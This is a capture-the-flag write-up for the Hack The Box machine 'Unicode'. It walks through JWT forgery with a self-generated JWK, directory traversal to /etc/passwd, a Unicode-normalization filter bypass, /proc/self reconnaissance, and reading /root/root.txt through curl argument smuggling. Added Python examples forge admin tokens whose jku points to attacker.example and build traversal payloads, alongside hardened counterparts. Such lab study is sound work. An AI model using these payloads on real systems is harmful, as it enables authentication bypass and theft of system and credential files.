Hack The Box: Unicode

Hack The Box

JWK Spoofing, Directory traversal, Unicode normalization, Use /proc to gather info…

Many elements. Much fun.

It took me two days to find the flags.

I used dirb for the first time (it comes pre-installed with Kali Linux), because somehow gobuster kept returning an error.

dirb http://10.10.11.126
gobuster dir --url http://10.10.11.126 --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

01:08 JWT token found

A JWT starts with ey (the base64url encoding of {") and has three dot-separated parts: header, payload and signature.

JWT.IO
JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties.

https://github.com/ticarpi/jwt_tool is also available.

03:51 Prepare JSON file with new key

ssh-keygen -f unicode.key
openssl rsa -text -noout -in unicode.key -modulus

If openssl refuses the key ("unable to load Private Key"), recent OpenSSH writes its own key format by default; generate the key with -m PEM so openssl gets a PEM RSA key. No sudo is needed to read a key you just created in your own directory.

xxd: make a hexdump or do the reverse.
  -r  reverse operation: convert (or patch) a hexdump into binary.
  -p  output in PostScript continuous hexdump style, also known as plain hexdump style.

Hexdump to binary, then base64, in one line:

echo -n **** | xxd -r -p | base64 -w 0

**** is the hex modulus of the RSA public key: the Modulus= line, or the colon-separated bytes from the -text output with the colons removed. base64 emits standard base64, but a JWK needs base64url, so replace + with -, / with _, and drop any trailing = padding before pasting it into the file.

JSON file:

{
    "keys": [
        {
            "kty": "RSA",
            "use": "sig",
            "kid": "hackthebox",
            "alg": "RS256",
            "n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs",
            "e": "AQAB"
        }
    ]
}
n   The modulus for the RSA public key, as a Base64urlUInt-encoded value.
e   The exponent for the RSA public key, as a Base64urlUInt-encoded value.

Base64urlUInt means the big-endian bytes of the unsigned integer, base64url-encoded (- and _ instead of + and /, no = padding) with no leading zero octets. The n above begins with AM, so it carries a leading 0x00 byte taken from openssl's output; most libraries tolerate that, but strictly the spec wants it dropped.

e is usually 65537 = AQAB.

Why "65537 = AQAB"?

65537 = 0x010001, i.e. three bytes: 00000001 00000000 00000001

Regrouped into the 6-bit chunks that base64 works on:

000000 010000 000000 000001

That is 0, 16, 0, 1 in the base64 alphabet: A Q A B.

So in this box we do not need to change e: the newly created key reports "publicExponent: 65537 (0x10001)", which is AQAB in the JSON file.
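The whole key-spoofing step in one place, as an added example that is not code from this write-up or from Hack The Box: it generates a key you control, produces the JWKS document in the same shape as the JSON file above (n and e as Base64urlUInt), and signs an RS256 token with the matching private key, using only the Python standard library instead of ssh-keygen/openssl/xxd. Everything specific is an assumption: the toy 1024-bit key (use 2048 bits or more for real work), the kid "hackthebox" copied from the JSON, the hypothetical jku URL, and the placeholder {"user": "admin"} payload; which header parameter (jku, jwk or x5u) the target honours is not stated on this page.

```python
# Added example, not code from this write-up or from Hack The Box: build a JWKS for a key
# you control and sign an RS256 token with it, Python standard library only.
# Assumptions: toy 1024-bit key (use 2048+ for real), kid "hackthebox" as in the JSON
# above, a hypothetical jku URL and a placeholder {"user": "admin"} claim.
import base64
import hashlib
import json
import random
import secrets

def b64url(data: bytes) -> str:
    """base64url without '=' padding, as JWT and JWK require (base64 -w 0 is not enough)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_uint(value: int) -> str:
    """Base64urlUInt (RFC 7518): big-endian bytes of an unsigned int, no leading 0x00 octet."""
    return b64url(value.to_bytes((value.bit_length() + 7) // 8, "big"))

def hex_modulus_to_n(openssl_hex: str) -> str:
    """JWK 'n' from the 'Modulus=...' line of `openssl rsa -modulus` or from the colon-separated
    bytes of `-text`; int() drops the leading 00 that -text prints."""
    digits = "".join(openssl_hex.split("=")[-1].replace(":", "").split())
    return b64url_uint(int(digits, 16))

def is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Trial division, then Miller-Rabin; adequate for a demo key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_rsa(bits: int = 1024, e: int = 65537) -> tuple:
    """Return (n, e, d). e is prime, so gcd(e, phi) == 1 exactly when e does not divide phi."""
    def prime(b):
        while True:
            cand = secrets.randbits(b) | (1 << (b - 1)) | 1   # b bits, odd
            if is_probable_prime(cand):
                return cand
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return p * q, e, pow(e, -1, phi)

def build_jwks(n: int, e: int, kid: str = "hackthebox") -> dict:
    """The document to host at the jku URL; same shape as the JSON file above."""
    return {"keys": [{"kty": "RSA", "use": "sig", "kid": kid, "alg": "RS256",
                      "n": b64url_uint(n), "e": b64url_uint(e)}]}

# DER prefix of DigestInfo for SHA-256, fixed by PKCS#1 v1.5
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

def pkcs1_v15_sha256(message: bytes, k: int) -> int:
    """EMSA-PKCS1-v1_5 as used by RS256: 00 01 FF..FF 00 || DigestInfo || SHA-256(message)."""
    t = SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def sign_jwt(header: dict, claims: dict, n: int, d: int) -> str:
    """RS256: signature = EM(header.payload)^d mod n, base64url-encoded."""
    def enc(obj):
        return b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = enc(header) + "." + enc(claims)
    k = (n.bit_length() + 7) // 8
    sig = pow(pkcs1_v15_sha256(signing_input.encode(), k), d, n)
    return signing_input + "." + b64url(sig.to_bytes(k, "big"))

def verify_jwt(token: str, n: int, e: int) -> bool:
    """What a server that trusted our JWKS computes: sig^e mod n == EM(header.payload)."""
    head, body, sig = token.split(".")
    k = (n.bit_length() + 7) // 8
    s = int.from_bytes(base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4)), "big")
    return pow(s, e, n) == pkcs1_v15_sha256(f"{head}.{body}".encode(), k)

def forge(n: int, e: int, d: int, jku: str = "http://attacker.example/jwks.json") -> str:
    """Token whose header points at our JWKS (jku assumed) with a placeholder admin claim."""
    header = {"alg": "RS256", "typ": "JWT", "kid": "hackthebox", "jku": jku}
    return sign_jwt(header, {"user": "admin"}, n, d)

if __name__ == "__main__":
    n, e, d = gen_rsa()
    print(json.dumps(build_jwks(n, e), indent=4))   # save as jwks.json and host it at the jku URL
    token = forge(n, e, d)
    print(token, "\nself-check:", verify_jwt(token, n, e))
```

The self-check is the same computation a server that fetched the hosted JWKS would do, which is the point of the attack: once the application trusts a key URL taken from the token, any token signed with that key verifies.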

CyberChef
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis

05:21 Directory traversal vulnerability

/../../../../../../../etc/passwd

05:35 Unicode issue

https://book.hacktricks.xyz/pentesting-web/unicode-normalization-vulnerability
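The traversal and the Unicode issue are two halves of one bug, so here is one added example (not code from the write-up or from the box) that shows both: a handler that checks the raw string for "../" and only then applies NFKC normalization is bypassed with U+2025 TWO DOT LEADER and U+FF0F FULLWIDTH SOLIDUS, which normalize to ".." and "/". It also enumerates every code point below U+10000 that folds to a given ASCII string, which is the general version of the single trick the page uses. The web root and the exact normalization step are assumptions; the page does not say which normalization the box's application performs.

```python
# Added example, not code from this write-up or the box: a traversal filter that runs
# before Unicode normalization, its hardened counterpart, and a scanner for the
# characters that make the bypass work. BASE_DIR and the NFKC step are assumptions.
import os
import unicodedata

BASE_DIR = "/var/www/static"   # hypothetical web root

def nfkc_equivalents(target: str, limit: int = 0x10000) -> list:
    """Every code point below `limit` whose NFKC form is exactly `target` (e.g. '..' or '/')."""
    return [cp for cp in range(0x80, limit)
            if not 0xD800 <= cp <= 0xDFFF
            and unicodedata.normalize("NFKC", chr(cp)) == target]

def naive_resolve(user_path: str) -> str:
    """Vulnerable: the blocklist sees the raw string; normalization happens afterwards."""
    if "../" in user_path or user_path.startswith("/"):
        raise ValueError("traversal rejected")
    normalized = unicodedata.normalize("NFKC", user_path)
    return os.path.normpath(os.path.join(BASE_DIR, normalized))

def hardened_resolve(user_path: str) -> str:
    """Normalize first, canonicalize, then require the result to stay under BASE_DIR."""
    normalized = unicodedata.normalize("NFKC", user_path)
    base = os.path.realpath(BASE_DIR)
    full = os.path.realpath(os.path.join(base, normalized))
    if os.path.commonpath([base, full]) != base:
        raise ValueError("traversal rejected")
    return full

def traversal_payload(depth: int = 7, target: str = "etc/passwd") -> str:
    """'..' as U+2025 and '/' as U+FF0F: no ASCII '../' in the raw string, but NFKC
    turns it into ../../../../../../../etc/passwd after the check has already passed."""
    return "\u2025\uff0f" * depth + target

def rejects(resolver, user_path: str) -> bool:
    """True when the resolver refuses the path (used by the self-check below)."""
    try:
        resolver(user_path)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print("folds to '..':", [hex(c) for c in nfkc_equivalents("..")])
    print("folds to '/' :", [hex(c) for c in nfkc_equivalents("/")])
    payload = traversal_payload()
    print("naive    ->", naive_resolve(payload))            # /etc/passwd
    print("hardened ->", "rejected" if rejects(hardened_resolve, payload) else "allowed")
```

The fix is ordering plus containment: normalize before any check, canonicalize with realpath, and compare against the canonical base directory rather than looking for a forbidden substring.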

05:46 /proc investigation


/proc gives you useful information about the server and its users.

/proc/self/ (the process that opens the file, so the web server when you reach it through the traversal):
cmdline — The command line the process was started with; the arguments are separated by NUL bytes, so they run together when displayed.
cwd — A symbolic link to the current working directory of the process; /proc/self/cwd/<file> reads <file> relative to that directory.
environ — The environment variables of the process as NAME=value entries, again separated by NUL bytes.
exe — A symbolic link to the executable of this process.
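Both cmdline and environ are NUL-separated, which is why they come back as one run-together line when read through a file-read bug. The following added example (not code from the write-up) parses them into argv and a dict, flags variable names worth a second look, and reads the live /proc/self entries when run on Linux. The sample bytes are constructed, and the list of "sensitive" name fragments is a heuristic of my own.

```python
# Added example, not from this write-up: parse the NUL-separated /proc/<pid>/cmdline and
# environ files. Sample data below is constructed; SENSITIVE_HINTS is an assumed heuristic.
import os

SENSITIVE_HINTS = ("PASS", "SECRET", "TOKEN", "KEY", "CREDENTIAL")

def parse_cmdline(raw: bytes) -> list:
    """argv of the process: NUL-separated with a trailing NUL."""
    return [part.decode(errors="replace") for part in raw.split(b"\0") if part]

def parse_environ(raw: bytes) -> dict:
    """NAME=value entries, NUL-separated; case is preserved, nothing is lower-cased."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" in entry:
            name, _, value = entry.partition(b"=")
            env[name.decode(errors="replace")] = value.decode(errors="replace")
    return env

def sensitive_names(env: dict) -> list:
    """Variable names that match the heuristic hints, sorted."""
    return sorted(k for k in env if any(h in k.upper() for h in SENSITIVE_HINTS))

def proc_summary(pid="self") -> dict:
    """Live read of the four entries listed above (Linux only)."""
    base = f"/proc/{pid}"
    with open(f"{base}/cmdline", "rb") as f:
        cmdline = parse_cmdline(f.read())
    with open(f"{base}/environ", "rb") as f:
        env = parse_environ(f.read())
    return {"cmdline": cmdline, "cwd": os.readlink(f"{base}/cwd"),
            "exe": os.readlink(f"{base}/exe"), "env": env,
            "sensitive": sensitive_names(env)}

# Constructed sample, as the raw bytes would look after reading /proc/self/* remotely.
SAMPLE_CMDLINE = b"python3\0/app/server.py\0--port\0" + b"8080\0"
SAMPLE_ENVIRON = (b"PATH=/usr/bin\0HOME=/home/app\0"
                  b"DB_PASSWORD=Hunter2\0NODE_ENV=production\0")

if __name__ == "__main__":
    print(parse_cmdline(SAMPLE_CMDLINE))
    env = parse_environ(SAMPLE_ENVIRON)
    print(sensitive_names(env))
    if os.path.isdir("/proc/self"):
        print(proc_summary()["cmdline"])
```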

06:29 Privilege escalation

curl

curl accepts file: URLs, which name files in the file system. The path portion of a file: URL consists of three parts:

a double slash (//)
the name of the system on which the file system is located, followed by a path separator character

For a local file the system name is left empty, which gives the file:///path form used below.

root flag is usually at /root/root.txt

The following get an "Invalid url" error:

file:/root/root.txt
file:///root/root.txt

The "file" part may be causing the validation error, so I added a \ somewhere in "file".

It worked.

However, there was no way to choose where the downloaded file went.

fi\le:/root/root.txt

f\ile:/root/root.txt

Now we need to specify where to download to.

However, a space was not accepted, as below:

f\ile:/root/root.txt -o /tmp/root.txt

So wrap everything in {}: bash brace expansion splits the list at the commas into separate words, which does the job the space would have done.

{f\ile:/root/root.txt,-o,/tmp/root.txt}

Example of brace expansion:

echo {this,is,love}
this is love
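Why both tricks work comes down to who sees the string first. An unquoted backslash before an ordinary character is removed by the shell, so f\ile: reaches curl as file:, and {a,b,c} is brace-expanded into three separate words; both happen only when the string is handed to a shell, after whatever validated it has already looked at it. The added example below (not code from the write-up or the box) puts a hypothetical validator with exactly that weakness beside a hardened one: the naive version checks substrings of the raw string and builds a command line for a shell, the hardened version parses the URL, allow-lists the scheme and passes argv directly to curl with no shell involved. The validator is my reconstruction of the behaviour observed above, not the box's code.

```python
# Added example, not code from this write-up or the box: a hypothetical validator with the
# observed weakness (raw-string checks before a shell sees the input) and a hardened one.
import shutil
import subprocess
from urllib.parse import urlsplit

def naive_validate(url: str) -> bool:
    """Substring checks on the raw string; the shell has not processed it yet."""
    return "file:" not in url.lower() and " " not in url

def naive_command(url: str) -> str:
    """The bug: this string is handed to a shell, e.g. os.system(naive_command(url))."""
    return "curl " + url

def bash_available() -> bool:
    return shutil.which("bash") is not None

def bash_words(arg: str) -> list:
    """What one unquoted word becomes after bash brace expansion and backslash removal."""
    res = subprocess.run(["bash", "-c", "printf '%s\\n' " + arg],
                         capture_output=True, text=True, check=True)
    return res.stdout.splitlines()

def hardened_validate(url: str) -> bool:
    """Parse, then allow-list the scheme; 'f\\ile:' and '{...}' have no valid scheme at all."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)

def hardened_argv(url: str, out_path: str) -> list:
    """argv for subprocess.run(argv) with shell=False: no expansion, no smuggled -o."""
    if not hardened_validate(url):
        raise ValueError("only http(s) URLs are allowed")
    return ["curl", "--proto", "=http,https", "-o", out_path, url]

if __name__ == "__main__":
    payload = r"{f\ile:/root/root.txt,-o,/tmp/root.txt}"
    print("naive check passes :", naive_validate(payload))
    print("string given to sh :", naive_command(payload))
    if bash_available():
        print("bash turns it into :", bash_words(payload))   # ['file:/root/root.txt', '-o', '/tmp/root.txt']
    print("hardened check     :", hardened_validate(payload))
```

The --proto option makes curl itself refuse non-http(s) schemes even if the validator is wrong, so the two checks back each other up.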